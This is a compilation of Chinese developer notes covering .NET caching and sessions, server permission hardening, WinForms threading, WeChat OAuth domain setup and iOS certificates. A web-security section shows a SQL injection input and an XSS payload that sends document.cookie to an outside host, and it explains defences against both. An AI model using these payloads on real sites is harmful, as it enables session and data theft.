对于具体化的查询结果，不支持该方法。

This method is not supported against a materialized query result.

可能对嵌套查询的子结果集进行 Count() 等操作，可以在内部 select 外套一层 .ToList()，我在万条记录中测试不影响执行时间，但没有具体分析生成的 SQL 语句和执行跟踪。

网站的“防跨站攻击”默认是开启的，对应网站根目录下存在 .user.ini 文件，可阻止该网站程序读写网站目录外的文件或目录。

通过 FTP 上传或通过 PHP 创建的文件（夹）的用户（组）都是 www:www，目录权限 755，文件权限 644

PHP 不需要“执行”权限，因为这个“执行”权限是针对 sh 的

因此 PHP 在该站任何位置具有写入权限

理想的权限控制是：pure-ftp 使用另外的用户（组），譬如 ftp:ftp

这样使用 www:www 的 PHP 就无法随意创建文件，只能在开放了“公共权限”中的“写入”权限的目录中创建。

查看系统用户组：cat /etc/group

查看系统用户：cut -d : -f 1 /etc/passwd

查看 pure-ftp 帮助：

/www/server/pure-ftpd/bin/pure-pw --help

修改 FTP 用户的所有者和组：

/www/server/pure-ftpd/bin/pure-pw usermod FTP用户名 -u 所有者 -g 组

重启 pure-ftp

上述命令经简单测试并没有更改 FTP 用户的所有者和组……

退而求其次的做法是通过 SSH 用 root 来上传网站程序代码，并开放上传目录的“写入”权限

还有重要的一点，在网站的配置文件中禁止这些有“写入”权限的目录中的 PHP 运行权限！（参：在 CentOS (Linux) 中设置目录写入权限，并禁止执行 php）

1. 在 NuGet 中安装 Microsoft.AspNetCore.Session 和 Newtonsoft.Json

2. 打开 Startup.cs，在 ConfigureServices 方法中加入（视情况配置相关属性）

   services.AddSession(options =>
   {
       // 设置了一个较短的时间，方便测试
       options.IdleTimeout = TimeSpan.FromSeconds(10);
       options.CookieHttpOnly = true;
   });

3. 在 Configure 方法中加入

   app.UseSession();

4. 添加 Extensions 文件夹并添加类 SessionExtensions.cs

   using Microsoft.AspNetCore.Http;
   using Newtonsoft.Json;
   
   public static class SessionExtensions
   {
       public static void Set<T>(this ISession session, string key, T value)
       {
           session.SetString(key, JsonConvert.SerializeObject(value));
       }
   
       public static T Get<T>(this ISession session, string key)
       {
           var value = session.GetString(key);
           return value == null ? default(T) :
                                 JsonConvert.DeserializeObject<T>(value);
       }
   }

5. 使用方法

   HttpContext.Session.Set("abc", 123);
   var v1 = HttpContext.Session.Get<int>("abc");
   HttpContext.Session.Remove("abc");
   var v2 = HttpContext.Session.Get<int>("abc");
   // v1 = 123, v2 = 0

经测试，.NET Framework 4.8 的 Cache.Insert() 已恢复正常。

安装 .NET Framework 4.7 后，不管项目有没有升级到 .NET Framework 4.7，使用 Cache.Insert() 添加的自动过期的缓存都不会过期了，可以使用 Cache.Add() 来解决！

使用 Cache.Insert() 例：

HttpRuntime.Cache.Insert(key, value, null, DateTime.Now.AddSeconds(5), Cache.NoSlidingExpiration);

改为使用 Cache.Add()：

HttpRuntime.Cache.Add(key, value, null, DateTime.Now.AddSeconds(5), Cache.NoSlidingExpiration, CacheItemPriority.Default, null);

如果 Cache 中已保存了具有相同 key 的项，则调用 Add 方法将不作任何更改。（Insert 方法则会覆盖该值）

完整测试代码：

public static DateTime DateTimeNow
{
    get
    {
        if (HttpRuntime.Cache["DateTimeNow"] == null)
        {
            HttpRuntime.Cache.Add("DateTimeNow", DateTime.Now, 
                null, DateTime.Now.AddSeconds(5), Cache.NoSlidingExpiration, 
                CacheItemPriority.Default, null);
        }
        return Convert.ToDateTime(HttpRuntime.Cache["DateTimeNow"]);
    }
}

在部分项目中（如 .NET Framework 4 项目中）发现上述改动仍不起作用，不会自动过期，那么可以采用以下方法：

方法一、可以记录将数据添加到 Cache 的时间，获取数据时判断该时间，超时则清除该 Cache 并重新赋值；

方法二、放弃缓存依赖，用定时器清除 Cache 数据。

互联网项目里边，SQL 注入漏洞、XSS 漏洞和猜测 URL 攻击这三个漏洞可谓历史悠久，然而直到今天还有人不断中枪，也真是微醺。

这几个漏洞说大也大，说小也小。说大是说这些漏洞危害大，会导致数据层面的安全问题；说小是从技术层面上讲都是未对外部输入做处理导致的，想要做针对性地防范很简单。下面简单看看这些漏洞的原因及防范方法。

SQL 注入

SQL 注入之所以存在，主要是因为工程师将外部的输入直接嵌入到将要执行的 SQL 语句中了。黑客可以利用这一点执行 SQL 指令来达到自己目的。举例来说，有一个接受参数为 id 的页面，在接收到id后从数据库中查询相应的数据， 其代码大致如下：

string  SQL = "SELECT * FROM [User] WHERE ID=" + Request["ID"];

正常情况下，Request["ID"] 为数字，这条 SQL 能很好地工作。如果我们认为修改 Request["ID"]，将其内容修改为 ID=1 OR 1=1 我们将得到这样一条 SQL：

SELECT * FROM [User] WHERE ID=1 OR 1=1

因为有 OR 的出现这条 SQL 语句已经可以获取 User 表中的任意信息。利用 SQL 注入漏洞，我们能够获取想要的信息，同时可以通过猜测-报错获取到数据库其它表的结构和信息，如果数据库、服务器权限设置不当，甚至有可能能获取到整个服务器的控制权限。

规避这种漏洞有很多种办法，以现代的编程语言来说，选择一个合适的 ORM 框架可以减少不少问题而且能大大提高开发效率。

如果因为某些原因需要继续写 SQL 语句，参数化查询也能解决这一问题。

对于需要拼接 SQL 语句的程序来说，注意两点也可以避免此问题。第一点是如果查询的字段类型是数字等类型，在拼接 SQL 前先判断输入是不是一个合法的数字，不合法则终止程序即可。第二点是如果字段类型是字符串，则记得将输入里的单引号进行转义。

XSS 攻击

如果说 SQL 注入是直接在 SQL 里执行了用户输入，那 XSS 攻击是在 HTML 里代码执行了用户输入。相对 SQL 注入，XSS 似乎更能引起人关注。几年前新浪微博被人利用 XSS 获取大量粉丝；3DM 也曾经被植入 script 代码对另一个游戏网站进行了惨无人道的 DDOS 攻击。

这里还是用 SQL 注入中的例子来说，假设页面输出为：

<div><%= Request["ID"] %></div>

这里我们可以在 Request["ID"] 里传入一段编码后的脚本，在最终输出的时候，就变成了一段可执行的 javascript 代码。

<script>window.location.href='anothersite.com?cookie=' + document.cookie;</script>

这段代码获取到当前页面的 cookie 值，并将 cookie 值传递到另一个名为 anothersite.com 的网站。利用这种模式，黑客可以获取到用户的登录信息或者将用户跳转到钓鱼网站来达成自己的目的。

XSS 攻击也可以简单分为两种，一种是上述例子中利用 url 引诱客户点击来实现；另一种是通过存储到数据库，在其它用户获取相关信息时来执行脚本。

防范 XSS 攻击需要在所有的字段都对输入的字符串进行 html encode（或者在输出时进行 encode）。如果需要使用富文本编辑的，可以考虑使用 UBB。

猜测 URL 攻击

猜测 URL 攻击是通过已知的 GET、POST 参数来猜测未公开的参数并尝试进行攻击。

以 Request["ID"] 为例，如果 ID 为 1 是合法的可访问的数据，可以通过尝试 ID=2，ID=3 等一系列来尝试是否对其它资源有访问、修改权限。如果控制不当，则可以轻松获得并修改数据。

要避免这种问题，方案一是使用较长的无规律的数字、字符来做为 ID，增大猜测难度；对于需要登录的程序，可以判断用户身份是否有对应 ID 数据的访问、修改权限；如果 ID 已经是自增类型且不需要登录，可以用过在 URL 里增加无规律的校验字段来避免。

其它需要注意的地方

安全是一个系统工程。

要提高系统安全性，最首要的一点是不要相信任何输入！不要相信任何输入！不要相信任何输入！重要的事情说三遍。这里的输入除了 URL 里的 GET 参数、POST 参数，还包括 COOKIE、Header 等可以进行修改的各类信息。

在程序设置方面，不输出客户不需要知道的各类信息，如原始的异常信息、异常附近的代码段等等，这样也能增加不少安全性。

最后，在测试或系统运行的过程中，可以使用类似 appscan 这样的安全检测工具来检查程序是否有漏洞。

最近要做个简单的类似 CNZZ 和百度统计的统计器，不可避免地遇到 JS 文件异步加载 和 给 JS 文件传参 的问题。

参考了 CNZZ 的代码以后，在 Chrome 的控制台发现以下警告：

A Parser-blocking, cross-origin script, http://s4.cnzz.com/stat.php?***, is invoked via document.write. This may be blocked by the browser if the device has poor network connectivity. See https://www.chromestatus.com/feature/5718547946799104 for more details.

Paul Kinlan 给出了解释，是因为使用了 document.write() 的方式输出了 <script src="***" /> HTML DOM，建议改成 document.appendChild() 或 parentNode.insertBefore()，最好的例子就是 Google Analytics。

<!-- Google Analytics -->
<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->

上述 JavaScript 跟踪代码段可以确保该脚本在所有浏览器中加载和异步执行。

加了一些注释，便于理解，官方英文版。

(function (i, s, o, g, r, a, m) {
  i['GoogleAnalyticsObject'] = r;
  // console.log(window['GoogleAnalyticsObject']) // 'ga'
  // console.log(i[r]) // undefined
  i[r] = i[r] || function () { // i[r] 就是 window['ga']，定义了一个函数
    (i[r].q = i[r].q || []).push(arguments) // 往 ga.q 这个数组中增加一项
  },
  i[r].l = 1 * new Date(); // 时间戳，写法等同于 new Date().getTime()
  // console.log(i[r]) // window['ga'] 就是上面那个 function
  a = s.createElement(o), // 创建一个 script 元素
  m = s.getElementsByTagName(o)[0]; // 文档中的第一个脚本（文档中肯定至少已有一个脚本了）
  a.async = 1; // 异步加载
  a.defer = 1; // 兼容旧浏览器（我自己加的）
  a.src = g;
  m.parentNode.insertBefore(a, m) // 将 a 脚本插入到 m 脚本之前
})(window, document, 'script', 'http://***/***.js', 'ga');
// i s o g r
ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');

过程是：

创建了一个 <script> 元素，并异步加载 http://***/***.js；初始化了一个全局函数 ga；在 ga() 命令队列中添加了两条命令。

现在我们可以在这个外部 js 中使用 ga.q 这个对象中的数据了，示例：

;(function () {
  console.log(ga.q);
})(window);

简单补充下，async 是 HTML5 属性，使支持异步加载 JS 文件；defer 只支持 IE，作用类似。

测试异步只需要将 js 文件换成服务端页面，并人为设置 sleep 时间即可，阻塞式调用的话会在加载 js 时暂停后续页面的渲染。

《Windows Server 2008 R2 Web 服务搭建流程》

前提一、安装完系统后，各分区的权限均设为：
    IIS_IUSRS        完全拒绝（不是什么都不勾，而是勾满右侧的拒绝）
一、创建网站用户，如 netXoyozoWww，密码永不过期，仅隶属于 IIS_IUSRS 组。
二、创建网站根目录 net.xoyozo.www，权限添加用户 netXoyozoWww， 允许“读取和执行”、“列出文件夹内容”、“读取”。
        创建上传目录 upload，用户 netXoyozoWww 的权限再允许“修改”、“写入”。
三、IIS 中添加网站，网站名称如 net.xoyozo.www，指定物理路径，点击连接为，特定用户，测试设置……
        主机名 www.xoyozo.net
四、应用程序池，把 net.xoyozo.www 改成实际需要的 .NET 版本；高级设置，标识，自定义帐户 netXoyozoWww
五、选中网站，日志，更改目录，应用
六、展示网站目录树，选中 upload，处理程序映射，编辑功能权限，取消“脚本”前的勾。
    此操作的结果会在该目录下创建 web.config 文件，切勿删除！尚未研究出被上传文件替换的解决方案。程序应严格控制上传路径，阻止修改或替换 web.config 文件

另：
    查看端口命令：netstat -an
 

问题描述：
当我们的界面需要在程序运行中不断更新数据时，当一个textbox的数据需要变化时，为了让程序执行中不出现界面卡死的现像，最好的方法就是多线程来解决
一个主线程来创建界面，使用一个子线程来执行程序并更新主界面
这样就不会出现卡死的现像了
这肯定是没有问题的，
但是为什么在使用的过程中一样会有很多地方会出现卡死呢，而且有用户跟我说是我的Httphelper类的问题，其实不是，而且我再次声明我的Httphelper类跟多线程并没有关系。不要在诬赖我了哦。
这个问题其实也困或了我很久，但是今天终于解决了，而且我发现很多人有这样的问题，所以我分享一个例子方便大家参考吧。
先来看看我的界面

当我单击
开始执行后

这个时候界面是不会卡死的，
只是数据在不断的更新
下面看看我的代码

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Threading;

namespace WindowsFormsApplication3
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }
        //创建一个委托，是为访问TextBox控件服务的。
        public delegate void UpdateTxt(string msg);
        //定义一个委托变量
        public UpdateTxt updateTxt;

        //修改TextBox值的方法。
        public void UpdateTxtMethod(string msg)
        {
            richTextBox1.AppendText(msg + "\r\n");
            richTextBox1.ScrollToCaret();
        }

        //此为在非创建线程中的调用方法，其实是使用TextBox的Invoke方法。
        public void ThreadMethodTxt(int n)
        {
            this.BeginInvoke(updateTxt, "线程开始执行，执行" + n + "次，每一秒执行一次");
            for (int i = 0; i < n; i++)
            {
                this.BeginInvoke(updateTxt, i.ToString());
                //一秒 执行一次
                Thread.Sleep(1000);
            }
            this.BeginInvoke(updateTxt, "线程结束");
        }
        //开启线程
        private void button1_Click(object sender, EventArgs e)
        {
            Thread objThread = new Thread(new ThreadStart(delegate
            {
                ThreadMethodTxt(Convert.ToInt32(textBox1.Text.Trim()));
            }));
            objThread.Start();
        }

        private void Form1_Load_1(object sender, EventArgs e)
        {
            //实例化委托
            updateTxt = new UpdateTxt(UpdateTxtMethod);
        }
    }
}

就这些代码，大家看注释应该就明白一点了，
主要是使用一个委托来更新界面的richTextBox1
这样写是肯定没有问题的，而且在我其它的更高级一点的例子里也是这么写的
C#多线程|匿名委托传参数|测试网站压力--升级版
http://www.sufeinet.com/thread-13-1-1.html
上面的文件大家可以做为参考
那问题现在那里呢，其实就出在这一句上

this.BeginInvoke(updateTxt, "线程结束");

大家也许已经发现了，我是这样写的，而不是

updateTxt("线程结束")；

这样来直接在子线程中使用，
我相信有很多同志都是这样写的，其实错就错在这里
如果直接使用

updateTxt("线程结束")；

大家想一下应该就明白了，
updateTxt是在主线程创建的，而我们在子线程中直接使用，运行的数据多了，就会出现卡死，这是界面信息堵死的原因，
所以就算是委托也不能直接在子线程中使用，而是要使用BeginInvoke方法来调用这个委托
这样才不会出现卡死的现像。
问题就解决了。
大家支持一下哦
下面是我的源码提供给大家下载吧
WindowsFormsApplication3.zip (49.65 KB)

在开发微信中的网页时，会遇到一些域名相关的配置：

① 公众号设置 - 功能设置 - 业务域名
② 公众号设置 - 功能设置 - JS接口安全域名
③ 接口权限 - 网页授权获取用户基本信息
④ 商户平台 - 产品中心 - 开发配置 - JSAPI支付授权目录
⑤ 小程序 - 开发 - 开发设置 - 业务域名
⑥ 公众号开发 - 基本设置 - IP白名单

第①种 业务域名：相对不重要，只是用来禁止显示“防欺诈盗号,请勿支付或输入qq密码”提示框，可配置 3 个二级或二级以上域名（个人理解是“非顶级域名”，即填写了 b.a.com 的话，对 c.b.a.com 不起作用，待测）。

我们网站的域名和公众号是没有绑定关系的，那么你在打开一个（可能是朋友分享的）网页时，跟哪个公众号的配置去关联呢，答案是 JS-SDK。

测试结果：由于一个月只有3次修改机会，这次先测二级域名，有效；再测顶级域名，有效；删除所有，仍有效。所以应该是缓存作用。过几天再试，然后下个月先测顶级域名，来确定直接填写顶级域名是否对所有二级域名有效。

第②种 JS接口安全域名：是配置所配置的域名下的网页可调用 JS-SDK。可配置 5 个一级或一级以上域名（个人理解是“任何级域名”，即填写了 b.a.com 对 c.b.a.com 也有效，但对 c.z.a.com 无效，待测。如果我们拥有顶级域名对应网站的控制权（上传验证文件到网站根目录），直接填写顶级域名即可）。
使用 JS-SDK 的每个网页都必须注入配置信息（wx.config），而之前必须获取 jsapi_ticket，jsapi_ticket api 的调用次数非常有限，必须全局缓存。而获取 jsapi_ticket 之前必须先获取 access_token，同样需要全局缓存。所以，我们专门做个接口，功能是传入需要使用 JS-SDK 的网页的 url，输出 wx.config 需要用到的配置信息，来实现在不同网页（网站）使用 JS-SDK。

第③种 网页授权域名：这是已认证的服务号才能享有的特权，主要作用是获取用户在该服务号中的 openid 和 unionid。可配置 1 个 2 个回调域名（可填写任意级别的域名，但仅对该域名的网页（网站）有效，若填写了 a.com 对 b.a.com 是无效的）。

因此，如果我们需要在不同二级域名甚至不同顶级域名下的网页（以下称之为活动页面）实现用户授权，需要做一个统一的代理授权页面（回调域名当然是填写这个页面所在的域名），引导用户依次打开：微信授权页面 - 代理授权页面 - 活动页面，根据开发说明文档，具体实现如下：

当用户第一次打开活动页面时，引导打开微信授权页面（https://open.weixin.qq.com/connect/oauth2/authorize），其中参数 redirect_uri 指定回调地址，即代理授权页面地址，参数 state 指定活动页面地址。微信授权页面返回 code 和 state，code 作为换取网页授权 access_token 的票据。到这一步，本来可以由代理授权页面直接拿这个 code 去换取 access_token、openid 和 unionid 了，但是由于当前用户还在 302 重定向过程中，将这些信息带入到活动页面时势必导致信息泄露，所以这里将 code 追加到 state 指定的网址上后重定向到活动页面，活动页面拿到 code 再通过服务器端向代理授权页面所在服务器请求 openid 和 unionid，并将它们保存于 Session 中视为用户登录。这样，服务号的 appid 和 secret 也能得到保护。代理授权页面请求的微信服务器接口地址是 https://api.weixin.qq.com/sns/oauth2/access_token。

注：网页授权 access_token 不同于 JS-SDK 中使用的全局唯一接口调用凭据 access_token，没有请求次数限制。 

流程既然通了，实现逻辑可以这样设定：

活动页面首先判断 Session 中是否有 openid 或 unionid，若有表示已授权登录；没有再判断地址栏是否有 code 参数，若有则调用代理授权页面所在服务器的接口，用 code 换 openid 和 unionid；没有则直接重定向到代理授权页面，带上 state。用 code 换 openid 和 unionid 时若成功则保存至 Session，若失败则仍然重定向到代理授权页面，带上 state，特别注意 state 中的活动页面地址确保没有 code 参数。

第④种 JSAPI支付授权目录：涉及到微信支付时用到，顾名思义是固定某一个网站内的某个目录，以“/”结尾。最多可添加 5 个。如果支付页面在目录 https://www.a.com/b/ 下，那么可以填写 https://www.a.com/b/ 或 https://www.a.com/（建议后者），暂未测试填写 https://a.com/ 会不会起作用。涉及支付安全，建议设置支付页面的最深一层不可写的目录，以防目录内被上传后门文件带来的安全隐患。

第⑤种 小程序业务域名：任何需要在小程序的 web-view 组件中打开的网页，都必须配置小程序业务域名，限制 20 个。该域名要求必须 https，可填入“任何级域名”（建议填顶级域名，即填写了 a.com 对 b.a.com 也有效。如果我们拥有顶级域名对应网站的控制权（上传验证文件到网站根目录），直接填写顶级域名即可）。

第⑥种 IP白名单：仅填写管理全局 access_token 的中控服务器的 IP。

总结：在上述自定义接口部署完成后，如果微信中的网页想获取用户的 unionid，则不需要配置域名，直接使用统一的代理授权即可；如果需要使用 JS-SDK 功能，如分享、上传等等，则需要配置 JS 接口安全域名；如果有表单，最好配置一下业务域名。

本文系个人经验总结，部分结果未经证实，欢迎指正！QQ：940534113

本文是一个初学者对苹果开发证书的理解，有一定局限性，不适合所有苹果开发者参考，欢迎批评指正。

发布 iOS 应用主要有三块内容：Certificates, Identifiers & Profiles

Certificates（证书）：是用来给应用程序签名的

Identifiers（标识符）：一个应用对应一个 ID，相当于应用程序的身份证

Provisioning Profiles（描述文件）：它将证书、标识符、设备结合起来，形成一个描述文件，让 Xcode 知道需要打一个怎么样的 .ipa 包

如何创建证书

创建 App ID 就不详说了，不要使用带通配符的名称。值得一提的是，如果要使用推送，必须勾选“Push Notifications”，其它功能按需勾选。

创建证书，需要用到 Mac 电脑上的“钥匙串访问”来生成一个“本地证书”（CSR 文件）：

打开“钥匙串访问” - 证书助理 - 从证书颁发机构请求证书 - 保存到磁盘

然后就可以拿这个本地证书去 Apple Developer 里生成“开发证书”或“发布证书”（CER 文件）。打包证书和推送证书生成过程类似，区别是选择“App Store and Ad Hoc”还是“Apple Push Notification service SSL”。下载后添加到钥匙串就完成了。

添加测试设备就不提了。

然后就是描述文件，同样有开发和发布两种。开发主要是用于 Xcode 环境中；发布中还分两种：App Store 是用于正式上线的，Ad Hoc 是用于测试设备的。下一步选择 App ID，下一步选择证书，然后给 Profile 取个能够分辨的名字，生成的是一个 mobileprovision 文件。

提供证书文件给第三方打包平台

一般需要提供“iOS Distribution 证书”、“推送证书”、“Ad Hoc”和“App Store”类型的 Profiles、App ID 以及 iTunes Connect 中的 Apple ID（不是指登录的邮箱，是指在 iTunes Connect 中创建的 App 在商店中的 ID）。

证书其实跟 App ID 不是一一对应的关系，多个 App 是可以使用同一个证书的。可以单独创建，到期互不影响。Download 后是 .cer 格式，用“钥匙串”工具可以导出 .p12 证书并设置密码。

如果由于命名无序或创建错误导致无法分辨上架中的 App 用的是哪个证书，哪个描述文件，那么，首先要知道这个 App ID 是多少（就是 iTunes Connect 中所谓的“套装 ID”），然后在 Provisioning Profiles 中挨个查看对应的 App ID，点击“Edit”还能看到使用的证书。

有些平台需要 .pem 文件，是由 .p12 文件通过一个命令转化而来的，具体可以百度。

证书过期怎么办

创建一个呗，然后描述文件 Edit，选择新的证书。

推送证书过期怎么办

在 App ID 里 Edit 就能查看 Push Notifications 项的 SSL Certificate 是否过期。如果过期需要重新创建证书，可以直接在 App ID 的 Edit 里快捷创建（需要“钥匙串”配合）。

不用重新提交 App Store 审核

换一台电脑，证书要怎么导过去

这个问题适用于自己使用 Xcode 开发应用的情况，暂时问一下百度吧。

注：本文部分总结来自百度，未经证实。

Apple Push Services 和 APNs Production iOS 这两种类型有什么区别？